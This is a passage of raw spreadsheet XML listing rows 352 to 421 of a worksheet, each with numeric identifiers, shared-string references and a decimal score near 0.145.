      </c>
    </row>
    <row r="352" ht="15.75" customHeight="1">
      <c r="A352" s="1">
        <v>17477.0</v>
      </c>
      <c r="B352" s="2">
        <v>4.9932335E7</v>
      </c>
      <c r="C352" s="2" t="s">
        <v>310</v>
      </c>
      <c r="D352" s="2">
        <v>1.0</v>
      </c>
      <c r="E352" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F352" s="2">
        <v>0.1484848484848485</v>
      </c>
    </row>
    <row r="353" ht="15.75" customHeight="1">
      <c r="A353" s="1">
        <v>18905.0</v>
      </c>
      <c r="B353" s="2">
        <v>5.4174129E7</v>
      </c>
      <c r="C353" s="2" t="s">
        <v>311</v>
      </c>
      <c r="D353" s="2">
        <v>1.0</v>
      </c>
      <c r="E353" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F353" s="2">
        <v>0.1484848484848485</v>
      </c>
    </row>
    <row r="354" ht="15.75" customHeight="1">
      <c r="A354" s="1">
        <v>20384.0</v>
      </c>
      <c r="B354" s="2">
        <v>1.1992966E7</v>
      </c>
      <c r="C354" s="2" t="s">
        <v>312</v>
      </c>
      <c r="D354" s="2">
        <v>1.0</v>
      </c>
      <c r="E354" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F354" s="2">
        <v>0.1484848484848485</v>
      </c>
    </row>
    <row r="355" ht="15.75" customHeight="1">
      <c r="A355" s="1">
        <v>24050.0</v>
      </c>
      <c r="B355" s="2">
        <v>9558521.0</v>
      </c>
      <c r="C355" s="2" t="s">
        <v>313</v>
      </c>
      <c r="D355" s="2">
        <v>1.0</v>
      </c>
      <c r="E355" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F355" s="2">
        <v>0.1484848484848485</v>
      </c>
    </row>
    <row r="356" ht="15.75" customHeight="1">
      <c r="A356" s="1">
        <v>25444.0</v>
      </c>
      <c r="B356" s="2">
        <v>1.3895074E7</v>
      </c>
      <c r="C356" s="2" t="s">
        <v>314</v>
      </c>
      <c r="D356" s="2">
        <v>1.0</v>
      </c>
      <c r="E356" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F356" s="2">
        <v>0.1484848484848485</v>
      </c>
    </row>
    <row r="357" ht="15.75" customHeight="1">
      <c r="A357" s="1">
        <v>27540.0</v>
      </c>
      <c r="B357" s="2">
        <v>2.2218782E7</v>
      </c>
      <c r="C357" s="2" t="s">
        <v>314</v>
      </c>
      <c r="D357" s="2">
        <v>1.0</v>
      </c>
      <c r="E357" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F357" s="2">
        <v>0.1484848484848485</v>
      </c>
    </row>
    <row r="358" ht="15.75" customHeight="1">
      <c r="A358" s="1">
        <v>19589.0</v>
      </c>
      <c r="B358" s="2">
        <v>5.6161343E7</v>
      </c>
      <c r="C358" s="2" t="s">
        <v>315</v>
      </c>
      <c r="D358" s="2">
        <v>1.0</v>
      </c>
      <c r="E358" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F358" s="2">
        <v>0.1484517304189436</v>
      </c>
    </row>
    <row r="359" ht="15.75" customHeight="1">
      <c r="A359" s="1">
        <v>30834.0</v>
      </c>
      <c r="B359" s="2">
        <v>4550985.0</v>
      </c>
      <c r="C359" s="2" t="s">
        <v>221</v>
      </c>
      <c r="D359" s="2">
        <v>1.0</v>
      </c>
      <c r="E359" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F359" s="2">
        <v>0.1484517304189436</v>
      </c>
    </row>
    <row r="360" ht="15.75" customHeight="1">
      <c r="A360" s="1">
        <v>32094.0</v>
      </c>
      <c r="B360" s="2">
        <v>5399868.0</v>
      </c>
      <c r="C360" s="2" t="s">
        <v>316</v>
      </c>
      <c r="D360" s="2">
        <v>1.0</v>
      </c>
      <c r="E360" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F360" s="2">
        <v>0.1484517304189436</v>
      </c>
    </row>
    <row r="361" ht="15.75" customHeight="1">
      <c r="A361" s="1">
        <v>32207.0</v>
      </c>
      <c r="B361" s="2">
        <v>5.4826714E7</v>
      </c>
      <c r="C361" s="2" t="s">
        <v>317</v>
      </c>
      <c r="D361" s="2">
        <v>1.0</v>
      </c>
      <c r="E361" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F361" s="2">
        <v>0.1484517304189436</v>
      </c>
    </row>
    <row r="362" ht="15.75" customHeight="1">
      <c r="A362" s="1">
        <v>28234.0</v>
      </c>
      <c r="B362" s="2">
        <v>2.5202567E7</v>
      </c>
      <c r="C362" s="2" t="s">
        <v>318</v>
      </c>
      <c r="D362" s="2">
        <v>1.0</v>
      </c>
      <c r="E362" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F362" s="2">
        <v>0.1484126984126985</v>
      </c>
    </row>
    <row r="363" ht="15.75" customHeight="1">
      <c r="A363" s="1">
        <v>25088.0</v>
      </c>
      <c r="B363" s="2">
        <v>1.2886876E7</v>
      </c>
      <c r="C363" s="2" t="s">
        <v>319</v>
      </c>
      <c r="D363" s="2">
        <v>1.0</v>
      </c>
      <c r="E363" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F363" s="2">
        <v>0.1479166666666667</v>
      </c>
    </row>
    <row r="364" ht="15.75" customHeight="1">
      <c r="A364" s="1">
        <v>18907.0</v>
      </c>
      <c r="B364" s="2">
        <v>5.4174129E7</v>
      </c>
      <c r="C364" s="2" t="s">
        <v>320</v>
      </c>
      <c r="D364" s="2">
        <v>1.0</v>
      </c>
      <c r="E364" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F364" s="2">
        <v>0.1478494623655915</v>
      </c>
    </row>
    <row r="365" ht="15.75" customHeight="1">
      <c r="A365" s="1">
        <v>28188.0</v>
      </c>
      <c r="B365" s="2">
        <v>2.5006756E7</v>
      </c>
      <c r="C365" s="2" t="s">
        <v>321</v>
      </c>
      <c r="D365" s="2">
        <v>1.0</v>
      </c>
      <c r="E365" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F365" s="2">
        <v>0.1478494623655915</v>
      </c>
    </row>
    <row r="366" ht="15.75" customHeight="1">
      <c r="A366" s="1">
        <v>28208.0</v>
      </c>
      <c r="B366" s="2">
        <v>2.5036012E7</v>
      </c>
      <c r="C366" s="2" t="s">
        <v>322</v>
      </c>
      <c r="D366" s="2">
        <v>1.0</v>
      </c>
      <c r="E366" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F366" s="2">
        <v>0.1478494623655915</v>
      </c>
    </row>
    <row r="367" ht="15.75" customHeight="1">
      <c r="A367" s="1">
        <v>29790.0</v>
      </c>
      <c r="B367" s="2">
        <v>3.5022539E7</v>
      </c>
      <c r="C367" s="2" t="s">
        <v>323</v>
      </c>
      <c r="D367" s="2">
        <v>1.0</v>
      </c>
      <c r="E367" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F367" s="2">
        <v>0.1478494623655915</v>
      </c>
    </row>
    <row r="368" ht="15.75" customHeight="1">
      <c r="A368" s="1">
        <v>20512.0</v>
      </c>
      <c r="B368" s="2">
        <v>1.3053144E7</v>
      </c>
      <c r="C368" s="2" t="s">
        <v>324</v>
      </c>
      <c r="D368" s="2">
        <v>1.0</v>
      </c>
      <c r="E368" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F368" s="2">
        <v>0.1478494623655914</v>
      </c>
    </row>
    <row r="369" ht="15.75" customHeight="1">
      <c r="A369" s="1">
        <v>33252.0</v>
      </c>
      <c r="B369" s="2">
        <v>7361272.0</v>
      </c>
      <c r="C369" s="2" t="s">
        <v>325</v>
      </c>
      <c r="D369" s="2">
        <v>1.0</v>
      </c>
      <c r="E369" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F369" s="2">
        <v>0.1478494623655914</v>
      </c>
    </row>
    <row r="370" ht="15.75" customHeight="1">
      <c r="A370" s="1">
        <v>33327.0</v>
      </c>
      <c r="B370" s="2">
        <v>7562023.0</v>
      </c>
      <c r="C370" s="2" t="s">
        <v>326</v>
      </c>
      <c r="D370" s="2">
        <v>1.0</v>
      </c>
      <c r="E370" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F370" s="2">
        <v>0.1478494623655914</v>
      </c>
    </row>
    <row r="371" ht="15.75" customHeight="1">
      <c r="A371" s="1">
        <v>20427.0</v>
      </c>
      <c r="B371" s="2">
        <v>1.2322122E7</v>
      </c>
      <c r="C371" s="2" t="s">
        <v>267</v>
      </c>
      <c r="D371" s="2">
        <v>1.0</v>
      </c>
      <c r="E371" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F371" s="2">
        <v>0.1478174603174604</v>
      </c>
    </row>
    <row r="372" ht="15.75" customHeight="1">
      <c r="A372" s="1">
        <v>24909.0</v>
      </c>
      <c r="B372" s="2">
        <v>1.2322121E7</v>
      </c>
      <c r="C372" s="2" t="s">
        <v>269</v>
      </c>
      <c r="D372" s="2">
        <v>1.0</v>
      </c>
      <c r="E372" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F372" s="2">
        <v>0.1478174603174604</v>
      </c>
    </row>
    <row r="373" ht="15.75" customHeight="1">
      <c r="A373" s="1">
        <v>24726.0</v>
      </c>
      <c r="B373" s="2">
        <v>1.171713E7</v>
      </c>
      <c r="C373" s="2" t="s">
        <v>327</v>
      </c>
      <c r="D373" s="2">
        <v>1.0</v>
      </c>
      <c r="E373" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F373" s="2">
        <v>0.1473429951690822</v>
      </c>
    </row>
    <row r="374" ht="15.75" customHeight="1">
      <c r="A374" s="1">
        <v>29796.0</v>
      </c>
      <c r="B374" s="2">
        <v>3.5113688E7</v>
      </c>
      <c r="C374" s="2" t="s">
        <v>328</v>
      </c>
      <c r="D374" s="2">
        <v>1.0</v>
      </c>
      <c r="E374" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F374" s="2">
        <v>0.1473429951690822</v>
      </c>
    </row>
    <row r="375" ht="15.75" customHeight="1">
      <c r="A375" s="1">
        <v>30501.0</v>
      </c>
      <c r="B375" s="2">
        <v>4.0004468E7</v>
      </c>
      <c r="C375" s="2" t="s">
        <v>329</v>
      </c>
      <c r="D375" s="2">
        <v>1.0</v>
      </c>
      <c r="E375" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F375" s="2">
        <v>0.1472222222222223</v>
      </c>
    </row>
    <row r="376" ht="15.75" customHeight="1">
      <c r="A376" s="1">
        <v>32648.0</v>
      </c>
      <c r="B376" s="2">
        <v>5872722.0</v>
      </c>
      <c r="C376" s="2" t="s">
        <v>330</v>
      </c>
      <c r="D376" s="2">
        <v>1.0</v>
      </c>
      <c r="E376" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F376" s="2">
        <v>0.147119341563786</v>
      </c>
    </row>
    <row r="377" ht="15.75" customHeight="1">
      <c r="A377" s="1">
        <v>29845.0</v>
      </c>
      <c r="B377" s="2">
        <v>3.5696966E7</v>
      </c>
      <c r="C377" s="2" t="s">
        <v>331</v>
      </c>
      <c r="D377" s="2">
        <v>1.0</v>
      </c>
      <c r="E377" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F377" s="2">
        <v>0.1467013888888889</v>
      </c>
    </row>
    <row r="378" ht="15.75" customHeight="1">
      <c r="A378" s="1">
        <v>29821.0</v>
      </c>
      <c r="B378" s="2">
        <v>3.5285948E7</v>
      </c>
      <c r="C378" s="2" t="s">
        <v>332</v>
      </c>
      <c r="D378" s="2">
        <v>1.0</v>
      </c>
      <c r="E378" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F378" s="2">
        <v>0.1466302367941713</v>
      </c>
    </row>
    <row r="379" ht="15.75" customHeight="1">
      <c r="A379" s="1">
        <v>32377.0</v>
      </c>
      <c r="B379" s="2">
        <v>5.6074204E7</v>
      </c>
      <c r="C379" s="2" t="s">
        <v>317</v>
      </c>
      <c r="D379" s="2">
        <v>1.0</v>
      </c>
      <c r="E379" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F379" s="2">
        <v>0.1466302367941713</v>
      </c>
    </row>
    <row r="380" ht="15.75" customHeight="1">
      <c r="A380" s="1">
        <v>32393.0</v>
      </c>
      <c r="B380" s="2">
        <v>5.6252495E7</v>
      </c>
      <c r="C380" s="2" t="s">
        <v>317</v>
      </c>
      <c r="D380" s="2">
        <v>1.0</v>
      </c>
      <c r="E380" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F380" s="2">
        <v>0.1466302367941713</v>
      </c>
    </row>
    <row r="381" ht="15.75" customHeight="1">
      <c r="A381" s="1">
        <v>21619.0</v>
      </c>
      <c r="B381" s="2">
        <v>2.4574241E7</v>
      </c>
      <c r="C381" s="2" t="s">
        <v>333</v>
      </c>
      <c r="D381" s="2">
        <v>1.0</v>
      </c>
      <c r="E381" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F381" s="2">
        <v>0.1465517241379311</v>
      </c>
    </row>
    <row r="382" ht="15.75" customHeight="1">
      <c r="A382" s="1">
        <v>30301.0</v>
      </c>
      <c r="B382" s="2">
        <v>3.7919521E7</v>
      </c>
      <c r="C382" s="2" t="s">
        <v>334</v>
      </c>
      <c r="D382" s="2">
        <v>1.0</v>
      </c>
      <c r="E382" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F382" s="2">
        <v>0.146551724137931</v>
      </c>
    </row>
    <row r="383" ht="15.75" customHeight="1">
      <c r="A383" s="1">
        <v>25630.0</v>
      </c>
      <c r="B383" s="2">
        <v>1.4460434E7</v>
      </c>
      <c r="C383" s="2" t="s">
        <v>335</v>
      </c>
      <c r="D383" s="2">
        <v>1.0</v>
      </c>
      <c r="E383" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F383" s="2">
        <v>0.1464646464646465</v>
      </c>
    </row>
    <row r="384" ht="15.75" customHeight="1">
      <c r="A384" s="1">
        <v>29832.0</v>
      </c>
      <c r="B384" s="2">
        <v>3.5394704E7</v>
      </c>
      <c r="C384" s="2" t="s">
        <v>336</v>
      </c>
      <c r="D384" s="2">
        <v>1.0</v>
      </c>
      <c r="E384" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F384" s="2">
        <v>0.1464646464646465</v>
      </c>
    </row>
    <row r="385" ht="15.75" customHeight="1">
      <c r="A385" s="1">
        <v>30951.0</v>
      </c>
      <c r="B385" s="2">
        <v>4736327.0</v>
      </c>
      <c r="C385" s="2" t="s">
        <v>337</v>
      </c>
      <c r="D385" s="2">
        <v>1.0</v>
      </c>
      <c r="E385" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F385" s="2">
        <v>0.1464646464646465</v>
      </c>
    </row>
    <row r="386" ht="15.75" customHeight="1">
      <c r="A386" s="1">
        <v>10667.0</v>
      </c>
      <c r="B386" s="2">
        <v>1.4387954E7</v>
      </c>
      <c r="C386" s="2" t="s">
        <v>338</v>
      </c>
      <c r="D386" s="2">
        <v>1.0</v>
      </c>
      <c r="E386" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F386" s="2">
        <v>0.146057347670251</v>
      </c>
    </row>
    <row r="387" ht="15.75" customHeight="1">
      <c r="A387" s="1">
        <v>23037.0</v>
      </c>
      <c r="B387" s="2">
        <v>5.0100332E7</v>
      </c>
      <c r="C387" s="2" t="s">
        <v>339</v>
      </c>
      <c r="D387" s="2">
        <v>1.0</v>
      </c>
      <c r="E387" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F387" s="2">
        <v>0.1460573476702509</v>
      </c>
    </row>
    <row r="388" ht="15.75" customHeight="1">
      <c r="A388" s="1">
        <v>22358.0</v>
      </c>
      <c r="B388" s="2">
        <v>3.4656879E7</v>
      </c>
      <c r="C388" s="2" t="s">
        <v>340</v>
      </c>
      <c r="D388" s="2">
        <v>1.0</v>
      </c>
      <c r="E388" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F388" s="2">
        <v>0.1459510357815443</v>
      </c>
    </row>
    <row r="389" ht="15.75" customHeight="1">
      <c r="A389" s="1">
        <v>20491.0</v>
      </c>
      <c r="B389" s="2">
        <v>1.28682E7</v>
      </c>
      <c r="C389" s="2" t="s">
        <v>341</v>
      </c>
      <c r="D389" s="2">
        <v>1.0</v>
      </c>
      <c r="E389" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F389" s="2">
        <v>0.1458333333333334</v>
      </c>
    </row>
    <row r="390" ht="15.75" customHeight="1">
      <c r="A390" s="1">
        <v>21240.0</v>
      </c>
      <c r="B390" s="2">
        <v>1.9772723E7</v>
      </c>
      <c r="C390" s="2" t="s">
        <v>342</v>
      </c>
      <c r="D390" s="2">
        <v>1.0</v>
      </c>
      <c r="E390" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F390" s="2">
        <v>0.1458333333333334</v>
      </c>
    </row>
    <row r="391" ht="15.75" customHeight="1">
      <c r="A391" s="1">
        <v>21385.0</v>
      </c>
      <c r="B391" s="2">
        <v>2.1686959E7</v>
      </c>
      <c r="C391" s="2" t="s">
        <v>343</v>
      </c>
      <c r="D391" s="2">
        <v>1.0</v>
      </c>
      <c r="E391" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F391" s="2">
        <v>0.1458333333333334</v>
      </c>
    </row>
    <row r="392" ht="15.75" customHeight="1">
      <c r="A392" s="1">
        <v>21637.0</v>
      </c>
      <c r="B392" s="2">
        <v>2.4705238E7</v>
      </c>
      <c r="C392" s="2" t="s">
        <v>344</v>
      </c>
      <c r="D392" s="2">
        <v>1.0</v>
      </c>
      <c r="E392" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F392" s="2">
        <v>0.1458333333333334</v>
      </c>
    </row>
    <row r="393" ht="15.75" customHeight="1">
      <c r="A393" s="1">
        <v>22499.0</v>
      </c>
      <c r="B393" s="2">
        <v>3.7232716E7</v>
      </c>
      <c r="C393" s="2" t="s">
        <v>345</v>
      </c>
      <c r="D393" s="2">
        <v>1.0</v>
      </c>
      <c r="E393" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F393" s="2">
        <v>0.1458333333333334</v>
      </c>
    </row>
    <row r="394" ht="15.75" customHeight="1">
      <c r="A394" s="1">
        <v>25058.0</v>
      </c>
      <c r="B394" s="2">
        <v>1.2868199E7</v>
      </c>
      <c r="C394" s="2" t="s">
        <v>341</v>
      </c>
      <c r="D394" s="2">
        <v>1.0</v>
      </c>
      <c r="E394" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F394" s="2">
        <v>0.1458333333333334</v>
      </c>
    </row>
    <row r="395" ht="15.75" customHeight="1">
      <c r="A395" s="1">
        <v>26989.0</v>
      </c>
      <c r="B395" s="2">
        <v>1.9772722E7</v>
      </c>
      <c r="C395" s="2" t="s">
        <v>342</v>
      </c>
      <c r="D395" s="2">
        <v>1.0</v>
      </c>
      <c r="E395" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F395" s="2">
        <v>0.1458333333333334</v>
      </c>
    </row>
    <row r="396" ht="15.75" customHeight="1">
      <c r="A396" s="1">
        <v>27015.0</v>
      </c>
      <c r="B396" s="2">
        <v>2.0025906E7</v>
      </c>
      <c r="C396" s="2" t="s">
        <v>346</v>
      </c>
      <c r="D396" s="2">
        <v>1.0</v>
      </c>
      <c r="E396" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F396" s="2">
        <v>0.1458333333333334</v>
      </c>
    </row>
    <row r="397" ht="15.75" customHeight="1">
      <c r="A397" s="1">
        <v>27374.0</v>
      </c>
      <c r="B397" s="2">
        <v>2.1686957E7</v>
      </c>
      <c r="C397" s="2" t="s">
        <v>343</v>
      </c>
      <c r="D397" s="2">
        <v>1.0</v>
      </c>
      <c r="E397" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F397" s="2">
        <v>0.1458333333333334</v>
      </c>
    </row>
    <row r="398" ht="15.75" customHeight="1">
      <c r="A398" s="1">
        <v>28121.0</v>
      </c>
      <c r="B398" s="2">
        <v>2.4705237E7</v>
      </c>
      <c r="C398" s="2" t="s">
        <v>344</v>
      </c>
      <c r="D398" s="2">
        <v>1.0</v>
      </c>
      <c r="E398" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F398" s="2">
        <v>0.1458333333333334</v>
      </c>
    </row>
    <row r="399" ht="15.75" customHeight="1">
      <c r="A399" s="1">
        <v>30736.0</v>
      </c>
      <c r="B399" s="2">
        <v>4.4029816E7</v>
      </c>
      <c r="C399" s="2" t="s">
        <v>347</v>
      </c>
      <c r="D399" s="2">
        <v>1.0</v>
      </c>
      <c r="E399" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F399" s="2">
        <v>0.1458333333333334</v>
      </c>
    </row>
    <row r="400" ht="15.75" customHeight="1">
      <c r="A400" s="1">
        <v>32562.0</v>
      </c>
      <c r="B400" s="2">
        <v>5769083.0</v>
      </c>
      <c r="C400" s="2" t="s">
        <v>348</v>
      </c>
      <c r="D400" s="2">
        <v>1.0</v>
      </c>
      <c r="E400" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F400" s="2">
        <v>0.1458333333333334</v>
      </c>
    </row>
    <row r="401" ht="15.75" customHeight="1">
      <c r="A401" s="1">
        <v>9143.0</v>
      </c>
      <c r="B401" s="2">
        <v>5.5261393E7</v>
      </c>
      <c r="C401" s="2" t="s">
        <v>349</v>
      </c>
      <c r="D401" s="2">
        <v>1.0</v>
      </c>
      <c r="E401" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F401" s="2">
        <v>0.1455026455026456</v>
      </c>
    </row>
    <row r="402" ht="15.75" customHeight="1">
      <c r="A402" s="1">
        <v>16620.0</v>
      </c>
      <c r="B402" s="2">
        <v>4.7063725E7</v>
      </c>
      <c r="C402" s="2" t="s">
        <v>350</v>
      </c>
      <c r="D402" s="2">
        <v>1.0</v>
      </c>
      <c r="E402" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F402" s="2">
        <v>0.1455026455026456</v>
      </c>
    </row>
    <row r="403" ht="15.75" customHeight="1">
      <c r="A403" s="1">
        <v>21816.0</v>
      </c>
      <c r="B403" s="2">
        <v>2.6881008E7</v>
      </c>
      <c r="C403" s="2" t="s">
        <v>351</v>
      </c>
      <c r="D403" s="2">
        <v>1.0</v>
      </c>
      <c r="E403" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F403" s="2">
        <v>0.1455026455026456</v>
      </c>
    </row>
    <row r="404" ht="15.75" customHeight="1">
      <c r="A404" s="1">
        <v>21923.0</v>
      </c>
      <c r="B404" s="2">
        <v>2.8418213E7</v>
      </c>
      <c r="C404" s="2" t="s">
        <v>352</v>
      </c>
      <c r="D404" s="2">
        <v>1.0</v>
      </c>
      <c r="E404" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F404" s="2">
        <v>0.1455026455026456</v>
      </c>
    </row>
    <row r="405" ht="15.75" customHeight="1">
      <c r="A405" s="1">
        <v>28559.0</v>
      </c>
      <c r="B405" s="2">
        <v>2.6881007E7</v>
      </c>
      <c r="C405" s="2" t="s">
        <v>351</v>
      </c>
      <c r="D405" s="2">
        <v>1.0</v>
      </c>
      <c r="E405" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F405" s="2">
        <v>0.1455026455026456</v>
      </c>
    </row>
    <row r="406" ht="15.75" customHeight="1">
      <c r="A406" s="1">
        <v>30778.0</v>
      </c>
      <c r="B406" s="2">
        <v>4.4739123E7</v>
      </c>
      <c r="C406" s="2" t="s">
        <v>353</v>
      </c>
      <c r="D406" s="2">
        <v>1.0</v>
      </c>
      <c r="E406" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F406" s="2">
        <v>0.1455026455026456</v>
      </c>
    </row>
    <row r="407" ht="15.75" customHeight="1">
      <c r="A407" s="1">
        <v>31015.0</v>
      </c>
      <c r="B407" s="2">
        <v>4.7733804E7</v>
      </c>
      <c r="C407" s="2" t="s">
        <v>354</v>
      </c>
      <c r="D407" s="2">
        <v>1.0</v>
      </c>
      <c r="E407" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F407" s="2">
        <v>0.1455026455026456</v>
      </c>
    </row>
    <row r="408" ht="15.75" customHeight="1">
      <c r="A408" s="1">
        <v>32536.0</v>
      </c>
      <c r="B408" s="2">
        <v>5.7379754E7</v>
      </c>
      <c r="C408" s="2" t="s">
        <v>355</v>
      </c>
      <c r="D408" s="2">
        <v>1.0</v>
      </c>
      <c r="E408" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F408" s="2">
        <v>0.1455026455026456</v>
      </c>
    </row>
    <row r="409" ht="15.75" customHeight="1">
      <c r="A409" s="1">
        <v>20566.0</v>
      </c>
      <c r="B409" s="2">
        <v>1.3474357E7</v>
      </c>
      <c r="C409" s="2" t="s">
        <v>356</v>
      </c>
      <c r="D409" s="2">
        <v>1.0</v>
      </c>
      <c r="E409" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F409" s="2">
        <v>0.1453703703703704</v>
      </c>
    </row>
    <row r="410" ht="15.75" customHeight="1">
      <c r="A410" s="1">
        <v>33734.0</v>
      </c>
      <c r="B410" s="2">
        <v>8531130.0</v>
      </c>
      <c r="C410" s="2" t="s">
        <v>357</v>
      </c>
      <c r="D410" s="2">
        <v>1.0</v>
      </c>
      <c r="E410" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F410" s="2">
        <v>0.1452241715399611</v>
      </c>
    </row>
    <row r="411" ht="15.75" customHeight="1">
      <c r="A411" s="1">
        <v>30819.0</v>
      </c>
      <c r="B411" s="2">
        <v>4536663.0</v>
      </c>
      <c r="C411" s="2" t="s">
        <v>358</v>
      </c>
      <c r="D411" s="2">
        <v>1.0</v>
      </c>
      <c r="E411" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F411" s="2">
        <v>0.1451077943615258</v>
      </c>
    </row>
    <row r="412" ht="15.75" customHeight="1">
      <c r="A412" s="1">
        <v>24614.0</v>
      </c>
      <c r="B412" s="2">
        <v>1.1442372E7</v>
      </c>
      <c r="C412" s="2" t="s">
        <v>330</v>
      </c>
      <c r="D412" s="2">
        <v>1.0</v>
      </c>
      <c r="E412" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F412" s="2">
        <v>0.1450617283950617</v>
      </c>
    </row>
    <row r="413" ht="15.75" customHeight="1">
      <c r="A413" s="1">
        <v>28154.0</v>
      </c>
      <c r="B413" s="2">
        <v>2.4861664E7</v>
      </c>
      <c r="C413" s="2" t="s">
        <v>359</v>
      </c>
      <c r="D413" s="2">
        <v>1.0</v>
      </c>
      <c r="E413" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F413" s="2">
        <v>0.1449652777777778</v>
      </c>
    </row>
    <row r="414" ht="15.75" customHeight="1">
      <c r="A414" s="1">
        <v>23859.0</v>
      </c>
      <c r="B414" s="2">
        <v>8276420.0</v>
      </c>
      <c r="C414" s="2" t="s">
        <v>360</v>
      </c>
      <c r="D414" s="2">
        <v>1.0</v>
      </c>
      <c r="E414" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F414" s="2">
        <v>0.144808743169399</v>
      </c>
    </row>
    <row r="415" ht="15.75" customHeight="1">
      <c r="A415" s="1">
        <v>25945.0</v>
      </c>
      <c r="B415" s="2">
        <v>1.5235034E7</v>
      </c>
      <c r="C415" s="2" t="s">
        <v>361</v>
      </c>
      <c r="D415" s="2">
        <v>1.0</v>
      </c>
      <c r="E415" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F415" s="2">
        <v>0.144808743169399</v>
      </c>
    </row>
    <row r="416" ht="15.75" customHeight="1">
      <c r="A416" s="1">
        <v>28061.0</v>
      </c>
      <c r="B416" s="2">
        <v>2.457424E7</v>
      </c>
      <c r="C416" s="2" t="s">
        <v>362</v>
      </c>
      <c r="D416" s="2">
        <v>1.0</v>
      </c>
      <c r="E416" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F416" s="2">
        <v>0.144808743169399</v>
      </c>
    </row>
    <row r="417" ht="15.75" customHeight="1">
      <c r="A417" s="1">
        <v>22273.0</v>
      </c>
      <c r="B417" s="2">
        <v>3.317606E7</v>
      </c>
      <c r="C417" s="2" t="s">
        <v>363</v>
      </c>
      <c r="D417" s="2">
        <v>1.0</v>
      </c>
      <c r="E417" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F417" s="2">
        <v>0.1438492063492064</v>
      </c>
    </row>
    <row r="418" ht="15.75" customHeight="1">
      <c r="A418" s="1">
        <v>22284.0</v>
      </c>
      <c r="B418" s="2">
        <v>3.3384142E7</v>
      </c>
      <c r="C418" s="2" t="s">
        <v>364</v>
      </c>
      <c r="D418" s="2">
        <v>1.0</v>
      </c>
      <c r="E418" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F418" s="2">
        <v>0.1438492063492064</v>
      </c>
    </row>
    <row r="419" ht="15.75" customHeight="1">
      <c r="A419" s="1">
        <v>10315.0</v>
      </c>
      <c r="B419" s="2">
        <v>5.769313E7</v>
      </c>
      <c r="C419" s="2" t="s">
        <v>365</v>
      </c>
      <c r="D419" s="2">
        <v>1.0</v>
      </c>
      <c r="E419" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F419" s="2">
        <v>0.1435185185185185</v>
      </c>
    </row>
    <row r="420" ht="15.75" customHeight="1">
      <c r="A420" s="1">
        <v>21548.0</v>
      </c>
      <c r="B420" s="2">
        <v>2.3568512E7</v>
      </c>
      <c r="C420" s="2" t="s">
        <v>366</v>
      </c>
      <c r="D420" s="2">
        <v>1.0</v>
      </c>
      <c r="E420" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F420" s="2">
        <v>0.1435185185185185</v>
      </c>
    </row>
    <row r="421" ht="15.75" customHeight="1">
      <c r="A421" s="1">
        <v>25330.0</v>
      </c>
      <c r="B421" s="2">
        <v>1.3474356E7</v>
      </c>
      <c r="C421" s="2" t="s">
        <v>356</v>
      </c>
      <c r="D421" s="2">
        <v>1.0</v>
      </c>
      <c r="E421" s="3" t="s">
        <v>6</v>
      </c>
